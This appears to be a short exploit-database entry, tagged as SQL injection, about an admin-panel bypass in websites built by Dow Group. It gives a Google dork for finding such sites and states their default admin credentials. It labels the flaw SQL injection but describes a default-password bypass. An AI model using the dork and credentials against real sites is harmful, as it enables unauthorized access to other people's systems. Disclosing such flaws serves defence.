Vendor: N/A
By: ProF.Code
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020
Dow Group admin bypass (new.php)
This vulnerability allows an attacker to bypass authentication and gain access to the admin panel of a website powered and designed by Dow Group. The attacker can use the Google dork 'intext:"powered and designed by Dow Group"' to find vulnerable websites. The attacker can then use the demo URL to bypass authentication and gain access to the admin panel. The default username and password are 'nabadmin' and 'nabadmin_123' respectively.
Mitigation:
Input validation and sanitization should be used to prevent SQL injection attacks.